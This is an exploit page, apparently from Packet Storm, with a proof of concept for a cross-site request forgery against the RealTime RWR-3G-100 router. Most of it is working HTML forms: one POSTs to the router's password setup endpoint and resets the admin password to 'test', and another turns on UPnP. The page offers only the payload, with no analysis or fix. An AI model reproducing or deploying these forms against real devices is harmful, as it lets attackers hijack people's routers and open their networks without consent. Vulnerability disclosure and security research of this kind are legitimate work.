RealTime RWR-3G-100 router suffers from a cross site request forgery vulnerability.
9958db6e4a33e71786b0330d416a220f1c73c39d6218e05719d261b1aae1c47a<!--
# Exploit Title: RealTime RWR-3G-100 Router Cross-Site Request Forgery
(Change Admin Password)
# Date: 13 Aug, 2017
# Vendor Homepage : http://www.rtsindia.com/
# Vendor Contact : https://www.linkedin.com/company/realtime-system-ltd.
# Firmware Version : Ver1.0.56
# Exploit Author: Touhid M.Shaikh
# Contact: https://github.com/touhidshaikh
# Website: http://touhidshaikh.com/
===================
Product Description
===================
Provides Wireless/ Wired Broadband connectivity to SOHO & SME. Provides
Broadband connectivity to multiple users on the move.Uses 3G/2.75G USB
Dongle to get connected to Broadband/ Optionally Uses Wired Broadband
connectivity. Supports HSPA, EVDO, UMTS, HSDPA & HSUPA USB Dongles and
Compatible with Blackberry & iPhone. Creates 802.11n Wi-Fi Hotspot for
Multiple Users to get connected to Broadband. Small & Sleek Portable
Router, Easy to Install & Manage.
-->
<!-- CHANGE ADMIN PASSWORD to test-->
<form action=http://192.168.1.1/goform/formPasswordSetup method=POST
name="password">
<input type="text" name="username" value="admin">
<input type="password" name="newpass" value="test">
<input type="password" name="confpass" value="test">
<input type="hidden" value="/status.asp" name="submit-url">
<input type="submit" value="Apply Changes" name="save">
<input type="reset" value=" Reset " name="reset" id="password Reset">
</form>
<!-- CHANGE ADMIN PASSWORD Ends here-->
<!---Enable The UPNP Service-->
<form action=http://192.168.1.1/goform/formUpnpSetup method=POST
name="upnpSetup">
<input type="radio" name="upnpfunction" id="upnpfunctiony" value="yes"
checked>
<input type="radio" name="upnpfunction" id="upnpfunctionn" value="no" >
<!--
<input type="radio" name="avupnpfunction" id="avupnpfunctiony"
value="yes" checked>
<input type="radio" name="avupnpfunction" id="avupnpfunctionn" value="no"
>
-->
<input type="submit" value="Apply Changes" name="save" id="upnp apply" >
<input type="reset" value=" Reset " name="reset" id="upnp Reset">
<input type="hidden" value="/upnp.asp" name="submit-url">
</form>
<!---Enable The UPNP Service Ends here-->
<!--
======GREEtZ=====
my cool Broo and Pratik K.tjani
-->
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed